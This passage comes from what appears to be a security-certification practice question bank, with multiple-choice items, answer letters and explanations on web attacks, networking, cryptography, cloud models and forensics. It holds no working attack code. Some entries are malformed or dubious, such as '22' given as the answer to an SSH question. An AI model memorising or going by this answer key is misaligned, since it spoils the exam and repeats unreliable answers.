D An attacker with an NFC reader can skim information from an NFC device in a crowded area, such as a busy train. Juice jacking is an attack on a USB OTG plug, which makes it act as a Trojan to try to install apps, although modern versions of both iOS and Android now require authorization before the device will accept the connection. Bluesnarfing exploits Bluetooth to steal information from someone else's phone. The exploit (now patched) allows attackers to circumvent authentication mechanisms. A remote wipe or kill switch is a security mechanism that can reset a stolen handset to factory defaults or clear it of any personal data (sanitization).
What type of attack replays a cookie? A. Cross-site request forgery (CSRF or XSRF) B. Clickjacking C. Secure Sockets Layer (SSL) strip attack D. Session hijacking
D. Session hijacking typically means replaying a cookie in some way. Attackers can sniff network traffic to obtain session cookies sent over unsecured networks. A CSRF attack exploits applications that use cookies to authenticate users and track sessions, by convincing the victim to start a session with the target site, then passing an HTTP request to the victim's browser that spoofs a legitimate action. In a clickjacking attack, the user sees and trusts a web application with a malicious layer that allows an attacker to intercept or redirect user input. An SSL strip targets local network clients as they attempt to connect to websites. The threat actor masquerades as the default gateway to redirect a client to an unsecure HTTP site.
PII
Personally Identifiable Information
Security specialists create a sinkhole to disrupt any adversarial attack attempts on a private network. Which solution do the specialists configure? A. Routing traffic to a different network B. Using fake telemetry in response to port scanning C. Configuring multiple decoy directories on a system D. Staging fake IP addresses as active
A A popular disruption strategy is to configure a DNS sinkhole to route suspect traffic to a different network, such as a honeynet, where it can be analyzed. Port triggering or spoofing can disrupt adversarial attacks by returning fake telemetry data when a host detects port scanning activity. To create disruption for an adversary, a security specialist can configure a web server with multiple decoy directories or dynamically generated pages to slow down scanning. Fake telemetry can disrupt an adversary by reporting IP addresses as up and available when they actually are not.
An organization stores data in different geographic locations for redundancy. This data replicates so that it is the same in all locations. Engineers have set the process to send data to the primary storage and then to the second database server. What configuration have the engineers established? A. Asynchronous replication B. Synchronous replication C. On-premises location D. Cloud location
A Asynchronous replication writes data to the primary storage first and then copies the data to the replicas at scheduled intervals. Synchronous replication writes data to all replicas simultaneously. On-premises location refers to physically located systems at an organization's facility. Cloud location refers to physical or virtual systems located at a cloud service provider rather than at an organization's facility.
A system administrator needs secure remote access into a Linux server. Evaluate the types of remote administration to recommend which protocol should be used in this situation. A. Telnet B. Secure Shell (SSH) C. Remote Desktop Protocol (RDP) D. Kerberos
22
Analyze mobile device deployment models to select the best explanation of the Corporate Owned, Personally-Enabled (COPE) deployment model. A. The employee may use the mobile device to access personal email and social media accounts. The device is chosen and supplied by the company. B. The employee may use the mobile device to access personal email and social media accounts. The device is chosen and supplied by the employee. C. The device is the property of the company and may only be used for company business. D. The employee may use the mobile device to access personal email and social media accounts. The device is chosen by the employee and supplied by the company.
A A Corporate Owned, Personally-Enabled (COPE) device is chosen and supplied by the company and remains its property. The employee may use it to access personal email and social media accounts. A Bring Your Own Device (BYOD) model is owned and supplied by the employee. The employee may use it to access personal email and social media accounts. A Corporate Owned, Business Only (COBO) device is the property of the company and may only be used for company business. A Choose Your Own Device (CYOD) is much like COPE, but the employee is given a choice of a device from a list.
A system administrator wants to install a mechanism to conceal the internal IP addresses of hosts on a private network. What tool can the administrator use to accomplish this security function? A. NAT gateway B. Reverse proxy server C. Virtual firewall D. Access Control List (ACL)
A A NAT gateway translates between a local and public network by substituting private IPs for a public IP and forwarding the requests to the public Internet, thereby concealing private addressing schemes. Deployed on the network edge, reverse proxy servers protect servers from direct contact with client requests from a public network (the Internet). Virtual firewalls often enact east-west security and zero-trust microsegmentation design paradigms. Virtual firewalls can inspect traffic as it passes from host-to-host or between virtual networks, rather than routing that traffic up to a firewall appliance and back. Firewall access control lists (ACLs) are configured on the principle of least access/least privilege.
An Internet Service Provider's (ISP) customer network is under a Distributed Denial of Service (DDoS) attack. The ISP decides to use a blackhole as a remedy. How does the ISP justify their decision? A. A blackhole drops packets for the affected IP address(es) and is in a separate area of the network that does not reach any other part of the network. B. A blackhole makes the attack less damaging to the ISP's other customers and continues to send legitimate traffic to the correct destination. C. A blackhole routes traffic destined to the affected IP address to a different network. Here, the ISP can analyze and identify the source of the attack, to devise rules to filter it. D. A blackhole is preferred, as it evaluates each packet in a multi-gigabit stream against an Access Control List (ACL) without overwhelming the processing resources.
A A blackhole drops packets for the affected IP addresses(es). A blackhole is an area of the network that cannot reach any other part of the network which protects the unaffected portion. A blackhole does make the attack less damaging to the other ISP customers but does not send legitimate traffic to the correct destination. The blackhole does not look at packets and simply drops all packets into the black hole. A sinkhole routing routes traffic to a particular IP address, to a different network, so the ISP can analyze and identify the source of the attack. A blackhole is preferred, but it does not evaluate each packet. An ACL option will evaluate each packet but can overwhelm the processing resources, which makes using a blackhole preferred.
Analyze the following statements and select the statement which correctly explains the difference between cross-site scripting (XSS) and cross-site request forgery (XSRF). A. XSRF spoofs a specific request against the web application, while XSS is a means of running any arbitrary code. B. XSS is not an attack vector, but the means by which an attacker can perform XSRF, the attack vector. C. XSRF requires a user to click an embedded malicious link, whereas the attacker embeds an XSS attack in the document object module (DOM) script. D. XSRF is a server-side exploit, while XSS is a client-side exploit.
A A client-side or cross-site request forgery (CSRF or XSRF) can exploit applications that use cookies to authenticate users and track sessions. XSS exploits a browser's trust and can perform an XSRF attack. XSS inserts a malicious script that appears to be part of a trusted site. XSS can conduct an XSRF attack. XSRF passes an HTTP request to the victim's browser that spoofs a target site action, such as changing a password. The attacker can disguise and accomplish this request without the victim necessarily having to click a link. XSRF is a client-side exploit. An XSS attack may be reflected (nonpersistent) or stored (persistent) and may target back-end systems (server-side) or client-side scripts.
Which statement best illustrates the importance of a strong true random number generator (TRNG) or pseudo-random number generator (PRNG) in a cryptographic implementation? A. A weak number generator leads to many published keys sharing a common factor. B. A weak number generator creates numbers that are never reused. C. A strong number generator creates numbers that are never reused. D. A strong number generator adds salt to encryption values.
A A cryptanalyst can test for the presence of common factors and derive the whole key much more easily. The TRNG or PRNG module in the cryptographic implementation is critical to its strength. Predictability is a weakness in either the cipher operation or within particular key values that make a ciphertext more vulnerable to cryptanalysis. Reuse of the same key within the same session can cause this weakness. The principal characteristic of a nonce is that it is never reused ("number used once") within the same key value. A nonce can be a random, pseudo-random, or counter value. Salt is a random or pseudo-random number or string. The term salt is used specifically in conjunction with hashing password values.
Which of the following utilizes both symmetric and asymmetric encryption? A. Digital envelope B. Digital certificate C. Digital evidence D. Digital signature
A A digital envelope is a type of key exchange system that utilizes symmetric encryption for speed and asymmetric encryption for convenience and security. A digital certificate is an electronic document that associates credentials with a public key. This only involves asymmetric encryption. Digital evidence or Electronically Stored Information (ESI) is evidence that cannot be seen with the naked eye; rather, it must be interpreted using a machine or process. There is no encryption involved. A digital signature is a message digest encrypted with a user's private key. It uses only asymmetric encryption to prove the identity of the sender of a message and to show a message has not been tampered with.
A system administrator is working to restore a system affected by a stack overflow. Analyze the given choices and determine which overflow vulnerability the attacker exploited. A. An attacker changes the return address of an area of memory used by a program subroutine. B. An attacker overwrites an area of memory allocated by an application to store variables. C. An attacker exploits unsecure code with more values than an array expects. D. An attacker causes the target software to calculate a value that exceeds the set bounds.
A A stack is an area of memory used by a program subroutine. It includes a return address, which is the location of the program that is called the subroutine. An attacker could use a buffer overflow to change the return address, which is called a stack overflow. A heap is an area of memory allocated by an application during execution to store a variable. A heap overflow can overwrite the variables with unexpected effects. An array is a type of variable designed to store multiple values. It is possible to create an array index overflow by exploiting unsecure code to load the array with more values than it expects. An integer overflow attack causes the target software to calculate a value that exceeds bounds that are set by the software.
A company conducts file sharing via a hosted private cloud deployment model. Which scenario accurately depicts this type of file sharing? A. A cloud hosted by a third party for the exclusive use of the organization. B. A cloud hosted by a third party and shared with other subscribers. C. A cloud that is completely private to and owned by the company that utilizes it. D. A cloud where several organizations share the costs of a cloud in order to pool resources for a common concern.
A A third party hosts a hosted private cloud deployment model for the exclusive use of the organization. This service is more secure and provides guaranteed performance but is more costly than other options. A third party hosts a public cloud deployment model and shares it with other subscribers. This is the most known form of cloud computing and is the least secure. A private cloud is completely private to and owned by the company that uses it. This is geared toward companies and services that require strict control, such as banking or government entities. Several organizations use a community cloud that shares the costs of either a hosted private or fully private cloud. This is usually done in order to pool resources for a common concern, such as standardization and security policies.
A security engineer is investigating a potential system breach. When compiling a report of the incident, how does the engineer classify the actor and the vector? A. Threat B. Vulnerability C. Risk D. Exploit
A A threat is the potential for something to exploit a vulnerability. The thing that poses the threat is called an actor, while the path used can be referred to as the vector. A vulnerability is a weakness that could be triggered accidentally or exploited intentionally to cause a security breach. Risk is the likelihood and impact (or consequence) of a threat actor exploiting a vulnerability. An exploit is a method that is used to expose and compromise a vulnerability.
Compare and contrast the characteristics of the various types of firewalls and select the correct explanation of a packet filtering firewall. A. An administrator configures an Access Control List (ACL) to deny access to IP addresses B. A firewall that maintains stateful information about the connection C. A firewall that analyzes HTTP headers and the HTML code to identify code that matches a pattern D. A stand-alone firewall implemented with routed interfaces or as a virtual wire transparent firewall
A An administrator configures a packet filtering firewall by specifying a group of rules, called an Access Control List (ACL). Each rule defines a specific type of data packet and the appropriate action to take when a packet matches the rule. Packet filtering firewalls do not maintain stateful information about the connection between two hosts. The firewall analyzes each packet independently, with no record of previously processed packets. Application aware firewalls can inspect the contents of packets at the application layer, which includes analyzing the HTTP headers and the HTML code. An appliance firewall is a stand-alone hardware firewall that monitors all traffic passing into and out of a network segment.
An attacker finds a way to exploit a vulnerability in a target application that allows the attacker to bypass a password requirement. Which method did the attacker most likely use? A. The attacker added LDAP filters as unsanitized input by creating a condition that is always true. B. The attacker inserted code into a back-end database by submitting a post to a bulletin board with a malicious script embedded in the message. C. The attacker embedded a request for a local resource via XML with no encryption. D. The attacker modified a basic SQL function, adding code to some input that an app accepts, causing it to execute the attacker's query.
A An attacker could exploit the vulnerability with an LDAP injection attack, inserting the (&) operator to return a condition that is always true, dropping the password filter for a name=value pair. A stored/persistent cross-site scripting (XSS) attack aims to insert unsanitized code into a back-end database a trusted site uses. When other users view the posted message, the malicious script executes. Data submitted via extensible markup language (XML) with no encryption or input validation is vulnerable to spoofing, request forgery, and injection of arbitrary data or code. In a SQL injection attack, the attacker modifies basic SQL functions by adding code. This could be with input an app accepts. In this case, LDAP was compromised and not an input to an application.
A manufacturing company hires a pentesting firm to uncover any vulnerabilities in their network with the understanding that the pen tester receives no information about the company's system. Which of the following penetration testing strategies is the manufacturing company requesting? A. Black box B. Sandbox C. Gray box D. White box
A Black box (or blind) is when the pen tester receives no privileged information about the network and its security systems. Black box tests are useful for simulating the behavior of an external threat. A sandbox is a test environment that accurately simulates a production environment. It is not a penetration testing strategy. Gray box describes the penetration strategy where the pen tester receives some information. Typically, this would resemble the knowledge of junior or non-IT staff to model particular types of insider threats. White box (or full disclosure) is when the pen tester receives complete access to information about the network. White box tests are useful for simulating the behavior of a privileged insider threat.
A system has a slight misconfiguration which could be exploited. A manufacturing workflow relies on this system. The admin recommends a trial of the proposed settings under which process? A. Change management B. Change control C. Asset management D. Configuration management
A Change management involves careful planning, with consideration for how the change will affect dependent components. For most significant or major changes, organizations should attempt to trial the change first. The admin performs a change control process prior to the actual change. This process requests and approves changes in a planned and controlled way. An asset management process tracks all the organization's critical systems, components, devices, and other objects of value in an inventory. Configuration management ensures that each component of ICT infrastructure is in a trusted state that has not diverged from its documented properties.
Which term defines the practice of collecting evidence from computer systems to an accepted standard in a court of law? A. Forensics B. Due process C. eDiscovery D. Legal hold
A Computer forensics is the practice of collecting evidence from computer systems to an accepted standard in a court of law. Due Process is a common law term used in the US and the UK which requires that people only be convicted of crimes following the fair application of the laws of the land. eDiscovery is a means of filtering the relevant evidence produced from all the data gathered by a forensic examination and storing it in a database in a format to use as evidence in a trial. Legal hold refers to the fact that information that may be relevant to a court case must be preserved.
When endpoint security experiences a breach, there are several classes of vector to consider for mitigation. Which type relates to exploiting an unauthorized service port change? A. Configuration drift B. Weak configuration C. Lack of controls D. Social Engineering
A Configuration drift applies when malware exploits an undocumented configuration change (shadow IT software or an unauthorized service/port, for instance). A weak configuration is correctly applied, but exploited anyway. Review of the settings is recommended to ensure the highest level of security. If endpoint protection/A-V, host firewall, content filtering, DLP, or MDM could have prevented an attack, then investigate the possibility of the lack of security controls. Social engineering means that a user executed an exploit. Use security education and awareness to reduce the risk of future attacks succeeding.
Code developers de-conflict coding with one another during which phase of the software development life cycle (SDLC)? Continuous integration Continuous delivery Continuous validation Continuous monitoring
A Continuous integration (CI) is the principle that developers should commit and test updates often. CI aims to detect and resolve coding conflicts early. Continuous delivery is about testing all of the infrastructures that support an app, including networking, database functionality, client software, and so on. Verification is a compliance testing process to ensure that the product or system meets its design goals. Validation is the process of determining whether the application is fit-for-purpose. These processes ensure the application conforms to the secure configuration baseline. An automation solution will have a system of continuous monitoring to detect service failures, security incidents, and failover mechanisms.
A document contains information about a company that is too valuable to permit any risks, and viewing is severely restricted. Analyze levels of classification and determine the appropriate classification for the document. A. Critical B. Confidential C. Classified D. Unclassified
A Documents labeled as critical contain information that is too valuable to permit any risk of its capture, and viewing is severely restricted. Documents labeled as confidential contain information that is highly sensitive and is for viewing only by approved persons within the organization or possibly by third parties under a Nondisclosure Agreement (NDA). This classification may also be called low. Documents labeled as classified contains information that limits viewing by only persons within an organization or by third parties that are under an NDA. This classification may also be called private, restricted, internal use only, or official use only. Unclassified documents are unrestricted and anyone can view the document. This document does not contain information that will harm the company if released. This classification is also known as public.
Many Internet companies, such as Google and Facebook, allow users to share a single set of credentials between multiple services providers. For example, a user could login to Amazon using their Facebook credentials. Which term correctly defines this example? A. Federation B. Single sign-on C. Permission D. Access control
A Federation means the company trusts the accounts created and managed by a different network. The networks establish trust relationships, so the identity of a user (principal) from network A (identity provider), can be trusted as authentic by network B (service provider). SSO (Single-Sign On) means a user authenticates to a system once, to access the resources the system has granted rights to use. This is not an example of a trust relationship. Permission is a security setting, not a trust relationship. It controls access to objects, including file system items and network resources. Access control is the process of determining and assigning privileges to resources, objects, and data. It does not involve a trust relationship.
Compare all of the functions within directory services and determine which statement accurately reflects the function of group memberships. A. The key provided at authentication lists a user's group memberships, which in turn allows certain access to resources on the network. B. The system compares group memberships with the user's logon credentials to determine if the user has access to the network resources. C. Group memberships contain entries for all usernames and groups that have permission to use the resource. D. Group memberships are like a database, where an object is similar to a record, and the attributes known about the object are similar to the fields.
A Group memberships of an authenticated user are on the access key and also contain the user's username. The system provides the access key upon authentication, and the user has access to all of the allowed resources based on the group membership. A security database holds authentication data for users and compares this information with the supplied authentication data from the user. If the supplied data and the data within the security database match, then the system has authenticated the user, and the security database generates an access key. An Access Control List (ACL) controls access to resources. The ACL contains entries for all usernames and groups that have permission to use the resource. A directory is like a database, such as an object is like a record, and the attributes known about the object are like fields.
Given knowledge of load balancing and clustering techniques, which configuration provides both fault tolerance and consistent performance for applications like streaming audio and video services? A. Active/Passive clustering B. Active/Active clustering C. First in, First out (FIFO) clustering D. Fault tolerant clustering
A In active/passive clustering, if the active node suffers a fault, the connection can failover to the passive node, without performance degradation. In an active/active cluster, both nodes process connections concurrently, using the maximum hardware capacity. During failover, the failed node's workload shifts to the remaining node, the workload on the remaining nodes increases, and performance degrades. Most network appliances process packets on a best effort and first in, first out (FIFO) basis, while the Quality of Service (QoS) framework prioritizes traffic based on its characteristics to better support voice and video applications susceptible to latency and jitter. Failover ensures that a redundant component, device, or application can quickly and efficiently take over the functionality of an asset that has failed.
When a company attempts to re-register their domain name, they find that an attacker has supplied false credentials to the domain registrar and redirected their host records to a different IP address. What type of attack has occurred? A. Domain hijacking B. Domain name system client cache (DNS) poisoning C. Rogue dynamic host configuration protocol (DHCP) D. Domain name system server cache (DNS) poisoning
A In domain hijacking (or brandjacking), the attacker steals a domain name by altering its registration information and then transferring the domain name to another entity. Before DNS is contacted, a text file named HOSTS is checked that may have name:IP address mappings recorded. If an attacker can place a false name:IP address mapping in the HOSTS file, poisoning the DNS cache, the attacker can redirect traffic. The Dynamic Host Configuration Protocol (DHCP) facilitates automatic network address allocation. If an attacker establishes a rogue DHCP, it can perform DoS or snoop on network information. DNS server cache poisoning corrupts records within the DNS server itself.
An engineer plans to acquire data from a disk. The disk is connected to the forensics workstation and is ready for the engineer. Which steps indicate a correct order of acquisition as they relate to integrity and non-repudiation? A. 1. A hash of the disk is made 2. A bit-by-bit copy is made 3. A second hash is made 4. A copy is made of the reference image B. 1. A hash of the disk is made 2. A copy is made of the reference image 3. A second hash is made 4. A bit-by-bit copy is made C. 1. A copy is made of the reference image 2. A hash of the disk is made 3. A bit-by-bit copy is made 4. A second hash is made D. 1. A copy is made of the reference image 2. A bit-by-bit copy is made 3. A hash of the disk is made 4. A second hash is made
A In the correct first step, the engineer makes a cryptographic hash of the disk media, using either the MD5 or SHA hashing function. The output of the function is a checksum. In the correct second step, the engineer makes a bit-by-bit copy of the media using the imaging utility. In the correct third step, the engineer then makes a second hash of the image, which should match the original hash of the media. In the correct fourth step, the engineer makes a copy of the reference image and then validates it again by the checksum. The engineer then performs an analysis on the copy.
A network user calls the help desk after receiving an error message. The caller complains that the error message does not indicate whether the username or password input was incorrect but simply states there was an authentication error. What does this situation illustrate? A. Effective exception handling B. Dynamic code analysis C. Minimizing data exposure D. Web application validation
A Invalid user input can cause an error or exception. A structured exception handler (SEH) dictates what the application should then do. The application must not fail in a way that allows an attacker to execute code or perform some sort of injection attack. Dynamic analysis tests the application under "real world" conditions using a staging environment. Data exposure is a fault that allows privileged information (such as a token, password, or personal data) to be read without being subject to the appropriate access controls. A web application can be designed to perform code execution and input validation. An example is a document object model (DOM) script to render the page using dynamic elements from user input.
An organization plans a move of systems to the cloud. In order to identify and assign areas of risk, which solution does the organization establish to contractually specify cloud service provider responsibilities? A. Service level agreement B. Trust relationship C. Responsibilities matrix D. High availability
A It is imperative to identify precisely which risks are transferring to the cloud, which risks the service provider is undertaking, and which risks remain with the organization. A service level agreement (SLA) outlines those risks and responsibilities. A trust relationship simply defines the relationship with a cloud service provider. The more important the service is to a business, the more risk the business invests in that trust relationship. A responsibility matrix is a good way to identify what risks exist, and who is responsible for them. The matrix can be part of an SLA. High availability is an approach to keeping systems functionality at a constant.
Evaluate approaches to applying patch management updates to select the accurate statement. A. Operating System major release updates can cause problems with software application compatibility. B. Applying all patches as released is more time consuming than only applying patches as needed. C. It is more costly to apply all patches, so most companies choose to apply patches on an as-needed basis. D. It is best practice to install patches immediately to provide the highest level of security for workstations.
A It is well recognized that Operating System major release updates can cause problems with software application compatibility. The least time-consuming approach is to apply all of the latest patches. A system administrator who applies patches on a case-by-case basis must stay up to date with security bulletins to see if a patch is necessary. Patches are usually provided at no cost. The cost associated with patches is the time it takes to test, review, and apply them. It is best practice to trial and update on a test system to try to discover whether it will cause any problems. Applying a patch immediately could do more harm than good to the workstations.
Identify the attack that can launch by running software against the CAM table on the same switch as the target. A. MAC flooding B. MAC spoofing C. ARP poisoning attack D. LLMNR
A MAC flooding is a variation of an ARP poisoning attack. While ARP poisoning is directed at hosts, MAC flooding is used to attack a switch. MAC spoofing changes the MAC address configured on an adapted interface or asserts the use of an arbitrary MAC address. It is simple to override a MAC address in software via OS commands, alterations to the network driver configuration, or using packet crafting software. An ARP poisoning attack broadcasts unsolicited ARP reply packets. A sophisticated ARP attack can launch by running software such as Dsniff or Ettercap. LLMNR is a name resolution services used in a Windows environment to resolve network addresses. Responder is an on-path type tool that can be used to exploit name resolution on a Windows network.
A company has an annual contract with an outside firm to perform a security audit on their network. The purpose of the annual audit is to determine if the company is in compliance with their internal directives and policies for security control. Select the broad class of security control that accurately demonstrates the purpose of the audit. A. Managerial B. Technical C. Physical D. Compensating
A Managerial is the control that gives oversight of the information system including selection of other security controls. An example of this type of control is regular scans and audits. Technical control is implemented as a system (hardware, software, or firmware). For example, firewalls, antivirus software, and OS access control models are technical controls. Technical controls may also be described as logical controls. Physical controls deter access to premises and hardware. Examples include alarms, gateways, and locks. A compensating control serves as a substitute for a principal control, as recommended by a security standard, and affords the same (or better) level of protection but uses a different methodology or technology.
Analyze the following scenarios and determine which accurately describes the use of an ad hoc Wi-Fi network. A. Two or more wireless devices connect to each other on a temporary basis. B. A smartphone shares its Internet connection with a PC. C. Mobile device connects with a wireless speaker and keyboard. D. A smartphone connects to a PC via Bluetooth.
A Multiple wireless devices can establish peer-to-peer connections with one another, rather than using an access point. The devices will operate in ad hoc mode rather than infrastructure mode and are meant to be temporary networks. A smartphone can share its mobile data connection with a PC, for example, via USB. This type of connection is commonly referred to as tethering where the smartphone acts as a hotspot. A mobile device creates a personal area network (PAN) when connecting to peripherals like a wireless speaker or keyboard via Bluetooth for example. A smartphone tethers to share a connection via a Bluetooth connection with a single PC. The term "Wi-Fi tethering" is also widely used to mean a hotspot.
An engineer retrieves data for a legal investigation related to an internal fraud case. The data in question is from an NTFS volume. What will the engineer have to consider with NTFS when documenting a data timeline? A. UTC time B. NTP Server C. Time server D. DHCP server
A NTFS uses UTC "internally." When collecting evidence, it is vital to establish the procedure to calculate a timestamp and note the difference between the local system time and UTC. Devices might be pointed towards an NTP server to synchronize time, but the engineer will need to record the times that the actual device itself is registering. Most computers have the clock configured to synchronize to a Network Time Protocol (NTP) server. Closely synchronized time is important for authentication and audit systems to work properly. A Dynamic Host Configuration Protocol (DHCP) server is not associated with time. A DHCP server distributes IP addresses to clients on the network. These logs could be helpful though during the investigation.
If an administrator in an exchange server needs to send digitally signed and encrypted messages, what messaging implementation will best suit the administrator's needs? A. Secure/Multipurpose Internet Mail Extensions (S/MIME) B. Secure Post Office Protocol v3 (POP3S) C. Internet Message Access Protocol v4 (IMAP4) D. Simple Mail Transfer Protocol (SMTP)
A One means of applying authentication and confidentiality on a per-message basis is an email encryption standard called Secure/Multipurpose Internet Mail Extensions (S/MIME). S/MIME adds digital signatures and public key cryptography to mail communications. To use S/MIME, a sender and receiver exchange digital certificates signed by a certification authority (CA). POP3 is a mailbox protocol designed to store the messages delivered by SMTP on a server. When the client connects to the mailbox, POP3 downloads the messages to the recipient's email client. IMAP4 is an application protocol that allows a client to access and manage email messages stored in a mailbox on a remote server. SMTP is the basic protocol used to send mail between hosts on the Internet.
A Certificate Revocation List (CRL) has a publish period set to 24 hours. Based on the normal procedures for a CRL, what is the most applicable validity period for this certificate? A. 26 hours B. 1 hour C. 23 hours D. 72 hours
A One or two hours over the publish period is considered normal thus making 26 hours within the window. The validity period is the period during which the CRL is considered authoritative. This is usually a bit longer than the publish period, giving a short window to update and keep the CRL authoritative. The validity period would not be less than the publish period as it would make the CRL nonauthoritative prior to the next publishing. If the validity period was set to 72 hours this would be much too long after the publish period. The CRL would be published two additional times prior to the validity period ending.
Which statement best describes key differences between symmetric and asymmetric cryptographic ciphers? Symmetric encryption is used for confidentiality, and uses the same key for encryption and decryption. Asymmetric encryption is primarily used for confidentiality, and uses different keys for encryption and decryption. Symmetric encryption is used for authentication, and is the most efficient method of encryption for large data transfers. Asymmetric encryption is used for non-repudiation and is the most efficient method of encryption for large data transfers.
A Symmetric encryption is used for confidentiality. Symmetric encryption is very fast and useful for bulk encryption of large amounts of data. Symmetric encryption cannot be used for authentication or integrity because both parties know the same key. Asymmetric encryption uses two different but related public and private keys to perform operations. Asymmetric encryption can be used to prove identity, authentication, non-repudiation, and key agreement and exchange. Symmetric encryption is very fast and useful for bulk encryption of large amounts of data. Symmetric encryption cannot be used for authentication or integrity, because both parties know the same key. Asymmetric encryption involves substantial computing overhead compared to symmetric encryption. Asymmetric encryption is inefficient for encrypting or transporting large amounts of data.
A security team suspects the unauthorized use of an application programming interface (API) to a private web-based service. Which metrics do the team analyze and compare to a baseline for response times and usage rates, while investigating suspected DDoS attacks? (Select all that apply.) A. Number of requests B. Error rates C. Latency D. Endpoint connections
A and C The number of requests is a basic load metric that counts the number of requests per second or requests per minute. Depending on the service type, admin can set a baseline for typical usage. Latency is the time in milliseconds (ms) taken for the service to respond to an API call. This can be measured for specific services or as an aggregate value across all services. Error rates measure the number of errors as a percentage of total calls, usually classifying error types under category headings. Admin can manage unauthorized and suspicious endpoint connections to the API in the same sort of way as remote access.
A system administrator downloads and installs software from a vendor website. Soon after installing the software, the administrator's computer is taken over remotely. After closer investigation, the software package was modified, probably while it was downloading. What action could have prevented this incident from occurring? A. Validate the software using a checksum B. Validate the software using a private certificate C. Validate the software using a key signing key D. Validate the software using Kerberos
A The administrator should have validated the software with a checksum, which uses a cryptographic algorithm to generate a unique hash value based on the file contents. If the file is changed, the checksum of the modified file will not match the original. A private certificate does not validate software. A key signing key is associated with Domain Name System Security Extensions (DNSSEC), which validates DNS responses to help mitigate spoofing and poisoning attacks. It does not apply to software. Kerberos is an authentication service based on a time-sensitive ticket-granting system. It is used to validate users, not software.
A security team has just added iris scanners to two access control points in a secure facility. They are in the process of making adjustments to ensure authorized users have access, while unauthorized users cannot get through. Analyze the scenario and determine what metric the team is in the process of fine-tuning. A. Crossover error rate (CER) B. False rejection rate (FRR) C. False acceptance rate (FAR) D. Type II error
A The process of fine-tuning a biometric system involves adjusting the crossover error rate, the point at which the false rejection rate and false acceptance rate meet. The false rejection rate (FRR) is also known as a type I error, which rejects authorized templates. The false acceptance rate (FAR) is the rate at which the system lets in unauthorized users, which constitutes a security breach. A type II error is a false positive, measured by the false acceptance rate (FAR). This is the rate at which unauthorized personnel gain access to the secure facility.
Compare physical access controls with network security to identify the statements that accurately connect the similarities between them. (Select all that apply.) Authentication provides users access through the barriers, while authorization determines the barriers around a resource. An example of authentication in networking is a user logging into the network with a smart card. Similarly, authentication in physical security is demonstrated by an employee using a badge to enter a building. Authorization provides users access through barriers, while authentication creates barriers around a resource. An example of authorization in networking is a user logging into the network with a smart card. Similarly, authorization in physical security is demonstrated by an employee using a badge to enter a building.
A and B Authentication creates access lists and identification mechanisms to allow approved persons through the barriers. Authorization determines the barriers around a resource so that access can be controlled through defined entry and exit points. An example of authentication is a user who logs into a network with a smart card. In terms of physical security, authentication is represented by an employee using a badge to enter a building. An example of authorization is used to determine which files a user has on the network after authenticating. In physical security, the same can be said of the barriers in place to determine which employees can access a controlled room.
Which type of employee training utilizes gaming and/or scenario-based techniques to emphasize training objectives? (Select all that apply.) A. Capture the flag (CTF) B. Computer-based training (CBT) C. Penetration Testing audit D. Role-based training
A and B Capture the Flag (CTF) is usually used in ethical hacker training programs and gamified competitions. Participants complete a series of challenges within a virtualized computing environment to discover a flag that represents a vulnerability or attack to overcome. Computer-based training (CBT) allows a student to acquire skills and experience by completing practical simulations or branching choice scenarios. CBT might use video game elements to improve engagement. If the penetration test were a purple team exercise then it would be considered scenario based learning, but because it was part of a mandatory requirement it would not be considered. Staff training should focus on user roles, which require different levels of security training, education, or awareness.
A security administrator employs a security method that can operate at layer 3 of the OSI model. Which of the following secure communication methods could the security administrator be using? (Select all that apply.) A. ESP B. AH C. TLS D. IKE
A and B Encapsulation Security Payload (ESP) provides confidentiality and/or authentication and integrity. ESP is one of the two core protocols of IPsec. AH is another core protocol of IPsec. The Authentication Header (AH) protocol performs a cryptographic hash on the whole packet, including the IP header, plus a shared secret key (known only to the communicating hosts), and adds this HMAC in its header as an Integrity Check Value (ICV). Transport Layer Security is applied at the application level, either by using a separate secure port or by using commands in the application protocol to negotiate a secure connection. The Internet Key Exchange (IKE) protocol handles authentication and key exchange, referred to as Security Associations (SA).
Analyze the following scenarios and determine which cases call for account disablement over account lockout. (Select all that apply.) A. Audit logs reveal suspicious activity on a privileged user's account. B. A user's company laptop and key fob are stolen at an airport. C. A user enters an incorrect password multiple times. D. A privileged user attempts to log onto a company server outside of authorized hours.
A and B If admin detects or suspects an account misuse, they can manually disable the account, preventing the account from being used for login. A remote logoff command can end a session in progress. Smart cards or USB keys can store a user's certificate and private key, which can authenticate to different PCs and mobile devices. A stolen laptop and key represent a vulnerability. An account enters a locked state because of a policy violation, such as entering an incorrect password. Lockouts usually occur for a limited duration. A time of day policy establishes authorized logon hours for an account. Time- and location-based policies prevent users from logging in outside of authorized hours and locales.
A developer considers using an API for service integration and automation. If choosing Representational State Transfer (REST) as the API, which features can the developer expect? (Select all that apply.) A. The ability to submit a request as an HTTP operation/verb B. It is a looser architectural framework C. It uses XML format messaging D. It has built-in error handling
A and B Requests sent as Simple Object Access Protocol (SOAP) must be in a correctly formatted XML document. However, with Representational State Transfer (REST) requests, they can be submitted as an HTTP operation/verb (GET or POST for example). Representational State Transfer (REST) is a looser architectural framework, also referred to as RESTful APIs. SOAP is a tightly specified protocol. Simple Object Access Protocol (SOAP) uses XML format messaging and has a number of extensions in the form of Web Services (WS) standards. Simple Object Access Protocol (SOAP) also has built-in error handling and supports common features, such as authentication, transport security, and asynchronous messaging.
A company security manager takes steps to increase security on Internet of Things (IoT) devices and embedded systems throughout a company's network and office spaces. What measures can the security manager use to implement secure configurations for these systems? (Select all that apply.) A. Isolate hosts that are using legacy versions of operating systems (OSes) from other network devices through network segmentation. B. Use wrappers, such as Internet Protocol Security (IPSec) for embedded systems' data in transit. C. Increase network connectivity for embedded systems so they receive regular updates. D. Maintain vendor-specific software configuration on Internet of Things (IoT) devices that users operate at home and in the office.
A and B Some embedded systems use legacy OSes, making them difficult to secure. Isolating these hosts from others through network segmentation and using endpoint security can help secure them against exploitation. One way of increasing the security of data in transit for embedded systems is through the use of wrappers, such as IPSec, which secures data through authentication and encryption. Only specific security control functions require network access for static environments, which the security manager should keep separate from the corporate network with perimeter security. When designed for residential use, IoT devices can suffer from weak defaults that customers do not take steps to secure. The security manager can configure them to "work" with a minimum of configuration effort.
An engineer utilizes digital forensics for information gathering. While doing so, the first focus is counterintelligence. Which concepts does the engineer pursue? (Select all that apply.) A. Identification and analysis of specific adversary tactics B. Retrospective network analysis C. Configure and audit active logging systems D. Inform risk management provisioning
